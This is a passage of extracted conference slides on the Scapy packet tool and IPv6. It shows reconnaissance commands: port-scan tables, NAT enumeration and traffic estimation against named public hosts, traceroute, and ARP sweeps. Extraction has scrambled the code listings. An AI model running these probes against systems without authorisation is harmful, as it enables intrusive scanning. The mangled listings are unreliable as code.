![Page 92: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/92.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Conversations
>>> a = sniff()
>>> a.conversations()
192.168.8.110
192.168.8.14
192.168.8.1192.168.8.42
192.168.8.35
192.168.8.21
P. Biondi / A. Ebalard Scapy and IPv6 networking 40/100
![Page 93: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/93.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
PS/PDF dump
>>> lst.pdfdump()
P. Biondi / A. Ebalard Scapy and IPv6 networking 41/100
![Page 94: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/94.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet Lists ManipulationOperators
A packet list can be manipulated like a list
You can add, slice, etc.
Example
>>> a = rdpcap("/tmp/dcnx.cap")
>>> a
< dcnx.cap: UDP:0 ICMP:0 TCP:20 Other:0>
>>> a[:10]
< mod dcnx.cap: UDP:0 ICMP:0 TCP:10 Other:0>
>>> a+a
< dcnx.cap+dcnx.cap: UDP:0 ICMP:0 TCP:40 Other:0>
P. Biondi / A. Ebalard Scapy and IPv6 networking 42/100
![Page 95: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/95.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet Lists ManipulationUsing tables
Tables represent a packet list in a z = f (x , y) fashion.
PacketList.make table() takes a λ : p −→ [x(p), y(p), z(p)]
For SndRcvList : λ : (s, r) −→ [x(s, r), y(s, r), z(s, r)]
They make a 2D array with z(p) in cells, organized by x(p)horizontally and y(p) vertically.
Example
>>> ans,_ = sr(IP(dst="www.target.com/30")/TCP(dport=[22,25,80]))
>>> ans.make_table(
lambda (snd,rcv): ( snd.dst, snd.dport,
rcv.sprintf("{TCP:%TCP.flags%}{ICMP:%ICMP.type%}")))
23.16.3.32 23.16.3.3 23.16.3.4 23.16.3.5
22 SA SA SA SA
25 SA RA RA dest-unreach
80 RA SA SA SA
P. Biondi / A. Ebalard Scapy and IPv6 networking 43/100
![Page 96: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/96.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending and ReceivingReturn first answer
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 44/100
![Page 97: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/97.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending and ReceivingReturn first answer
>>> sr1( IP(dst="192.168.8.1")/ICMP() )
P. Biondi / A. Ebalard Scapy and IPv6 networking 44/100
![Page 98: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/98.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending and ReceivingReturn first answer
>>> sr1( IP(dst="192.168.8.1")/ICMP() )
Begin emission:
..Finished to send 1 packets.
.*
Received 4 packets, got 1 answers, remaining 0 packets
< IP version=4L ihl=5L tos=0x0 len=28 id=46681 flags= frag=0L
ttl=64 proto=ICMP chksum=0x3328 src=192.168.8.1
dst=192.168.8.14 options=’’ |< ICMP type=echo-reply code=0
chksum=0xffff id=0x0 seq=0x0 |< Padding load=’\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x91\xf49\xea’ |>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 44/100
![Page 99: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/99.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending and ReceivingReturn first answer
>>> sr1( IP(dst="192.168.8.1")/ICMP() )
Begin emission:
..Finished to send 1 packets.
.*
Received 4 packets, got 1 answers, remaining 0 packets
< IP version=4L ihl=5L tos=0x0 len=28 id=46681 flags= frag=0L
ttl=64 proto=ICMP chksum=0x3328 src=192.168.8.1
dst=192.168.8.14 options=’’ |< ICMP type=echo-reply code=0
chksum=0xffff id=0x0 seq=0x0 |< Padding load=’\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x91\xf49\xea’ |>>>
Compare this result to hping ’s one :
# hping --icmp 192.168.8.1
HPING 192.168.8.1 (eth0 192.168.8.1): icmp mode set, [...]
len=46 ip=192.168.8.1 ttl=64 id=42457 icmp seq=0 rtt=2.7 ms
P. Biondi / A. Ebalard Scapy and IPv6 networking 44/100
![Page 100: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/100.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
NAT enumerationHow many boxes behind this IP ?
>>> a,b=sr( IP(dst="target")/TCP(sport=[RandShort()]*1000) )
>>> a.plot(lambda (s,r): r.id)
P. Biondi / A. Ebalard Scapy and IPv6 networking 45/100
![Page 101: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/101.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
NAT enumerationHow many boxes behind this IP ?
>>> a,b=sr( IP(dst="target")/TCP(sport=[RandShort()]*1000) )
>>> a.plot(lambda (s,r): r.id)
0
10000
20000
30000
40000
50000
60000
70000
0 100 200 300 400 500 600 700 800 900 1000
P. Biondi / A. Ebalard Scapy and IPv6 networking 45/100
![Page 102: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/102.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
NAT enumerationHow many boxes behind this IP ?
0
10000
20000
30000
40000
50000
60000
70000
0 100 200 300 400 500 600 700 800 900 1000
www.apple.com
0
2
4
6
8
10
12
14
16
0 100 200 300 400 500 600 700 800 900 1000
www.cisco.com
0
10000
20000
30000
40000
50000
60000
70000
0 100 200 300 400 500 600 700 800 900 1000
www.google.com
28200
28400
28600
28800
29000
29200
29400
29600
29800
30000
0 100 200 300 400 500 600 700 800 900 1000
www.microsoft.com
0
10000
20000
30000
40000
50000
60000
0 100 200 300 400 500 600 700 800 900 1000
www.yahoo.fr
-1
-0.5
0
0.5
1
0 100 200 300 400 500 600 700 800
www.kernel.org
P. Biondi / A. Ebalard Scapy and IPv6 networking 46/100
![Page 103: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/103.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Remote traffic estimation
>>> a,b = srloop(IP(dst="www.target.com")/TCP(sport=RandShort()),
prn=lambda (s,r):r.id)
>>> a.diffplot(lambda (s1,r1),(s2,r2): (r2.id-r1.id))
P. Biondi / A. Ebalard Scapy and IPv6 networking 47/100
![Page 104: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/104.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Remote traffic estimation
>>> a,b = srloop(IP(dst="www.target.com")/TCP(sport=RandShort()),
prn=lambda (s,r):r.id)
>>> a.diffplot(lambda (s1,r1),(s2,r2): (r2.id-r1.id))
100
200
300
400
500
600
700
800
900
1000
1100
0 5 10 15 20 25 30 35 40 45
P. Biondi / A. Ebalard Scapy and IPv6 networking 47/100
![Page 105: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/105.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Multiple RTT ploting
>>> res,unans = srloop(IP(dst="target.com",ttl=(5,10))/TCP())
>>> res.multiplot(lambda (s,r): (r.src,(r.time%400,
r.time-s.time)),with="lines")
P. Biondi / A. Ebalard Scapy and IPv6 networking 48/100
![Page 106: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/106.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Multiple RTT ploting
>>> res,unans = srloop(IP(dst="target.com",ttl=(5,10))/TCP())
>>> res.multiplot(lambda (s,r): (r.src,(r.time%400,
r.time-s.time)),with="lines")
0.05
0.1
0.15
0.2
0.25
0.3
160 180 200 220 240 260 280 300 320 340
212.73.240.2024.68.115.209212.27.57.89
204.70.193.142212.73.207.134.68.109.132
P. Biondi / A. Ebalard Scapy and IPv6 networking 48/100
![Page 107: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/107.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Outline
1 Introduction to the network testing tools world
2 The Scapy ConceptConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
3 Scapy + IPv6 = Scapy6IPv6Scapy6 capabilitiesICMPv6 Support
4 Fun Security with Scapy6Playing with Routing HeadersQuick OS support summary
5 Conclusion
P. Biondi / A. Ebalard Scapy and IPv6 networking 49/100
![Page 108: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/108.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
High-Level commandsTraceroute
>>> ans,unans=traceroute(["www.apple.com","www.cisco.com","www.microsoft.com"])
P. Biondi / A. Ebalard Scapy and IPv6 networking 50/100
![Page 109: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/109.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
High-Level commandsTraceroute
>>> ans,unans=traceroute(["www.apple.com","www.cisco.com","www.microsoft.com"])
Received 90 packets, got 90 answers, remaining 0 packets
17.112.152.32:tcp80 198.133.219.25:tcp80 207.46.19.30:tcp80
1 172.16.15.254 11 172.16.15.254 11 172.16.15.254 11
2 172.16.16.1 11 172.16.16.1 11 172.16.16.1 11
[...]
11 212.187.128.57 11 212.187.128.57 11 212.187.128.46 11
12 4.68.128.106 11 4.68.128.106 11 4.68.128.102 11
13 4.68.97.5 11 64.159.1.130 11 209.247.10.133 11
14 4.68.127.6 11 4.68.123.73 11 209.247.9.50 11
15 12.122.80.22 11 4.0.26.14 11 63.211.220.82 11
16 12.122.10.2 11 128.107.239.53 11 207.46.40.129 11
17 12.122.10.6 11 128.107.224.69 11 207.46.35.150 11
18 12.122.2.245 11 198.133.219.25 SA 207.46.37.26 11
19 12.124.34.38 11 198.133.219.25 SA 64.4.63.70 11
20 17.112.8.11 11 198.133.219.25 SA 64.4.62.130 11
21 17.112.152.32 SA 198.133.219.25 SA 207.46.19.30 SA
[...]
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 50/100
![Page 110: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/110.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
High-Level commandsTraceroute
>>> ans,unans=traceroute(["www.apple.com","www.cisco.com","www.microsoft.com"])
Received 90 packets, got 90 answers, remaining 0 packets
17.112.152.32:tcp80 198.133.219.25:tcp80 207.46.19.30:tcp80
1 172.16.15.254 11 172.16.15.254 11 172.16.15.254 11
2 172.16.16.1 11 172.16.16.1 11 172.16.16.1 11
[...]
11 212.187.128.57 11 212.187.128.57 11 212.187.128.46 11
12 4.68.128.106 11 4.68.128.106 11 4.68.128.102 11
13 4.68.97.5 11 64.159.1.130 11 209.247.10.133 11
14 4.68.127.6 11 4.68.123.73 11 209.247.9.50 11
15 12.122.80.22 11 4.0.26.14 11 63.211.220.82 11
16 12.122.10.2 11 128.107.239.53 11 207.46.40.129 11
17 12.122.10.6 11 128.107.224.69 11 207.46.35.150 11
18 12.122.2.245 11 198.133.219.25 SA 207.46.37.26 11
19 12.124.34.38 11 198.133.219.25 SA 64.4.63.70 11
20 17.112.8.11 11 198.133.219.25 SA 64.4.62.130 11
21 17.112.152.32 SA 198.133.219.25 SA 207.46.19.30 SA
[...]
>>> ans[0][1]
< IP version=4L ihl=5L tos=0xc0 len=68 id=11202 flags= frag=0L ttl=64 proto=ICMP chksum=0xd6b3
src=172.16.15.254 dst=172.16.15.101 options=’’ |< ICMP type=time-exceeded code=0 chksum=0x5a20 id=0x0
seq=0x0 |< IPerror version=4L ihl=5L tos=0x0 len=40 id=14140 flags= frag=0L ttl=1 proto=TCP chksum=0x1d8f
src=172.16.15.101 dst=17.112.152.32 options=’’ |< TCPerror sport=18683 dport=80 seq=1345082411L ack=0L
dataofs=5L reserved=16L flags=S window=0 chksum=0x5d3a urgptr=0 |>>>>
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 50/100
![Page 111: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/111.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
High-Level commandsTraceroute
>>> ans,unans=traceroute(["www.apple.com","www.cisco.com","www.microsoft.com"])
Received 90 packets, got 90 answers, remaining 0 packets
17.112.152.32:tcp80 198.133.219.25:tcp80 207.46.19.30:tcp80
1 172.16.15.254 11 172.16.15.254 11 172.16.15.254 11
2 172.16.16.1 11 172.16.16.1 11 172.16.16.1 11
[...]
11 212.187.128.57 11 212.187.128.57 11 212.187.128.46 11
12 4.68.128.106 11 4.68.128.106 11 4.68.128.102 11
13 4.68.97.5 11 64.159.1.130 11 209.247.10.133 11
14 4.68.127.6 11 4.68.123.73 11 209.247.9.50 11
15 12.122.80.22 11 4.0.26.14 11 63.211.220.82 11
16 12.122.10.2 11 128.107.239.53 11 207.46.40.129 11
17 12.122.10.6 11 128.107.224.69 11 207.46.35.150 11
18 12.122.2.245 11 198.133.219.25 SA 207.46.37.26 11
19 12.124.34.38 11 198.133.219.25 SA 64.4.63.70 11
20 17.112.8.11 11 198.133.219.25 SA 64.4.62.130 11
21 17.112.152.32 SA 198.133.219.25 SA 207.46.19.30 SA
[...]
>>> ans[0][1]
< IP version=4L ihl=5L tos=0xc0 len=68 id=11202 flags= frag=0L ttl=64 proto=ICMP chksum=0xd6b3
src=172.16.15.254 dst=172.16.15.101 options=’’ |< ICMP type=time-exceeded code=0 chksum=0x5a20 id=0x0
seq=0x0 |< IPerror version=4L ihl=5L tos=0x0 len=40 id=14140 flags= frag=0L ttl=1 proto=TCP chksum=0x1d8f
src=172.16.15.101 dst=17.112.152.32 options=’’ |< TCPerror sport=18683 dport=80 seq=1345082411L ack=0L
dataofs=5L reserved=16L flags=S window=0 chksum=0x5d3a urgptr=0 |>>>>
>>> ans[57][1].summary()
’Ether / IP / TCP 198.133.219.25:80 > 172.16.15.101:34711 SA / Padding’
P. Biondi / A. Ebalard Scapy and IPv6 networking 50/100
![Page 112: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/112.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
High-Level commandsTraceroute graphing, AS clustering
>>> ans.graph()
P. Biondi / A. Ebalard Scapy and IPv6 networking 51/100
![Page 113: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/113.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
High-Level commandsTraceroute graphing, AS clustering
>>> ans.graph()
7018[ATT-INTERNET4 - AT&T WorldNet]
8075[MICROSOFT-CORP---MSN-AS-BLOCK]
12076[HOTMAIL-AS - Hotmail Corporati]
109[CISCO-EU-109 Cisco Systems Glo]
3356[LEVEL3 Level 3 Communications]
714[APPLE-ENGINEERING - Apple Comp]
12.122.10.2
12.122.10.6
12.122.80.22
12.124.34.38
17.112.8.11
12.122.2.245
207.46.40.129
207.46.35.150
207.46.37.26
64.4.63.70
64.4.62.130
207.46.19.30 80: SA
128.107.224.69
198.133.219.25 80: SA
128.107.239.53
63.211.220.82
209.247.9.50
212.187.128.57
4.68.128.106
4.0.26.14
64.159.1.130
4.68.123.73
4.68.128.102
209.247.10.133 4.68.97.5
212.187.128.46
4.68.127.6
17.112.152.32 80: SA
172.16.15.254
172.16.16.1
[...]
P. Biondi / A. Ebalard Scapy and IPv6 networking 51/100
![Page 114: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/114.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
High-Level commandsTraceroute graphing, AS clustering
12076[HOTMAIL-AS - Hotmail Corporati]
714[APPLE-ENGINEERING - Apple Comp]
12.122.10.2
12.122.10.6
12.124.34.38
17.112.8.11
12.122.2.245
207.46.40.129
207.46.35.150
207.46.37.26
64.4.63.70
64.4.62.130
207.46.19.30 80: SA
128.107.224.69
198.133.219.25 80: SA
128.107.239.53
17.112.152.32 80: SA
P. Biondi / A. Ebalard Scapy and IPv6 networking 51/100
![Page 115: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/115.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
High-Level commandsTraceroute graphing, 3D toy
>>> ans.trace3D()
P. Biondi / A. Ebalard Scapy and IPv6 networking 52/100
![Page 116: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/116.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
High-Level commandsTraceroute graphing, 3D toy
>>> ans.trace3D()
P. Biondi / A. Ebalard Scapy and IPv6 networking 52/100
![Page 117: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/117.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
High-Level commandsARP ping
>>> arping("172.16.15.0/24")
Begin emission:
*Finished to send 256 packets.
*
Received 2 packets, got 2 answers, remaining 254 packets
00:12:3f:0a:84:5a 172.16.15.64
00:12:79:3d:a3:6a 172.16.15.254
(< ARPing: UDP:0 TCP:0 ICMP:0 Other:2>,
< Unanswered: UDP:0 TCP:0 ICMP:0 Other:254>)
P. Biondi / A. Ebalard Scapy and IPv6 networking 53/100
![Page 118: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/118.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Outline
1 Introduction to the network testing tools world
2 The Scapy ConceptConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
3 Scapy + IPv6 = Scapy6IPv6Scapy6 capabilitiesICMPv6 Support
4 Fun Security with Scapy6Playing with Routing HeadersQuick OS support summary
5 Conclusion
P. Biondi / A. Ebalard Scapy and IPv6 networking 54/100
![Page 119: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/119.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Implementing a new protocol
Each layer is a subclass of Packet
Each layer is described by a list of fields
This description is sufficient for assembly and disassembly
Each field is an instance of a Field subclass
Each field has at least a name and a default value
Example
1 c l a s s Test ( Packet ) :2 name = "Test protocol"
3 f i e l d s d e s c = [4 ByteF i e l d ( "field1" , 1 ) ,5 XShor tF ie ld ( "field2" , 2 ) ,6 IntEnumFie ld ( "field3" , 3 , { 1 : "one" , 10 : "ten" } ) ,7 ]
P. Biondi / A. Ebalard Scapy and IPv6 networking 55/100
![Page 120: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/120.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Use Scapy in your own toolsExecutable interactive add-on
You can extend Scapy in a separate file and benefit from Scapyinteraction
Example
1 #! /usr/bin/env python
23 from scapy import ∗45 c l a s s Test ( Packet ) :6 name = "Test packet"
7 f i e l d s d e s c = [ Sho r tF i e l d ( "test1" , 1 ) ,8 Sho r tF i e l d ( "test2" , 2) ]9
10 def make test ( x , y ) :11 r e t u r n Ether ( )/ IP ( )/ Test ( t e s t 1=x , t e s t 2=y )1213 i n t e r a c t ( mydict=g l o b a l s ( ) , mybanner="Test add -on v3.14" )
P. Biondi / A. Ebalard Scapy and IPv6 networking 56/100
![Page 121: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/121.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Use Scapy in your own toolsExternal script
You can make your own autonomous Scapy scripts
Example
1 #! /usr/bin/env python
23 import s y s
4 i f l e n ( s y s . argv ) != 2 :5 p r i n t "Usage: arping <net >\n eg: arping 192.168.1.0/24"
6 s y s . e x i t (1 )78 from scapy import srp , Ether ,ARP, conf
9 conf . verb=010 ans , unans=s rp ( Ether ( dst="ff:ff:ff:ff:ff:ff" )11 /ARP( pdst=s y s . argv [ 1 ] ) ,12 t imeout=2)1314 f o r s , r i n ans :15 p r i n t r . s p r i n t f ( "%Ether.src% %ARP.psrc%" )
P. Biondi / A. Ebalard Scapy and IPv6 networking 57/100
![Page 122: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/122.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Continuous traffic monitoring
use sniff() and the prn paramter
the callback function will be applied to every packet
BPF filters will improve perfomances
store=0 prevents sniff() from storing every packets
Example
1 #! /usr/bin/env python
2 from scapy import ∗34 def a r p mon i t o r c a l l b a c k ( pkt ) :5 i f ARP in pkt and pkt [ARP ] . op i n ( 1 , 2 ) : #who -has or is -at
6 r e t u r n pkt . s p r i n t f ( "%ARP.hwsrc% %ARP.psrc%" )78 s n i f f ( prn=a rp mon i t o r c a l l b a ck , f i l t e r="arp" , s t o r e =0)
P. Biondi / A. Ebalard Scapy and IPv6 networking 58/100
![Page 123: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/123.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
Outline
1 Introduction to the network testing tools world
2 The Scapy ConceptConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
3 Scapy + IPv6 = Scapy6IPv6Scapy6 capabilitiesICMPv6 Support
4 Fun Security with Scapy6Playing with Routing HeadersQuick OS support summary
5 Conclusion
P. Biondi / A. Ebalard Scapy and IPv6 networking 59/100
![Page 124: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/124.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
Structural differences with IPv4New header format
from 14 to 8 fields
E x t e n s i o n H e a d e r I n f o r m a t i o n
F l o w L a b e lV e r s i o n T r a f f i c C l a s sP a y l o a d L e n g t h N e x t H e a d e r H o p L i m i tS o u r c e I P v 6 A d d r e s sD e s t i n a t i o n I P v 6 A d d r e s s 4 0 o c t e t sN e x t H e a d e r T a i l l e v a r i a b l eP a y l o a d
2 04 88
81 61 2 8 81 2 8
3 2 b i t s
P. Biondi / A. Ebalard Scapy and IPv6 networking 60/100
![Page 125: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/125.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
Structural differences with IPv4Chaining and extensions
Goodbye IP options, welcome IPv6 extensions!
F r a g m e n tH e a d e rI P v 6 T C PT C P D a t aN e x t h e a d e rI P v 6 I C M P v 6I C M P v 6N e x t h e a d e rI P v 6 E S PE S PN e x t h e a d e r U D PU D P D a t aN e x t h e a d e r
123 I P v 6 I C M P v 6I C M P v 6N e x t h e a d e rR o u t i n gH e a d e rR o u t i n gH e a d e rN e x t h e a d e r F r a g m e n tH e a d e rN e x t h e a d e rP. Biondi / A. Ebalard Scapy and IPv6 networking 61/100
![Page 126: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/126.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
Functional differences with IPv4Forget all you knew for IPv4
Autoconfiguration Mechanisms
ARP has gone. Extended by Neighbor Discovery
Broadcast replaced by link-local scope multicast
End-to-End principle
Releasing core routers from intensive computation.
Fragmentation is performed by end nodesChecksum computation is performed by end nodes at L4IPv6 header fixed size simplifies handling (or not).
NAT makes no sense under IPv6 : no states =⇒ no SPoF.
P. Biondi / A. Ebalard Scapy and IPv6 networking 62/100
![Page 127: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/127.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
Outline
1 Introduction to the network testing tools world
2 The Scapy ConceptConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
3 Scapy + IPv6 = Scapy6IPv6Scapy6 capabilitiesICMPv6 Support
4 Fun Security with Scapy6Playing with Routing HeadersQuick OS support summary
5 Conclusion
P. Biondi / A. Ebalard Scapy and IPv6 networking 63/100
![Page 128: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/128.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
A tour of IPv6 supportGeneralities
Works on Linux, FreeBSD, NetBSD and Mac OS X
Requires a recent version of Scapy
Provided under GNU GPLv2 License
Developed with Guillaume Valadon (Esaki Lab / LIP6)
Link : http://namabiiru.hongo.wide.ad.jp/scapy6
Remarks, bug reports and patches are welcome !!!
P. Biondi / A. Ebalard Scapy and IPv6 networking 64/100
![Page 129: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/129.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
A tour of IPv6 supportIPv6 support : make it natural
s/IP/IPv6/g
$ sudo scapy6
Welcome to Scapy (1.0.4.84beta)
IPv6 enabled
>>> a=IPv6(dst="www.netbsd.org")/TCP(dport=[21,80])
>>> a
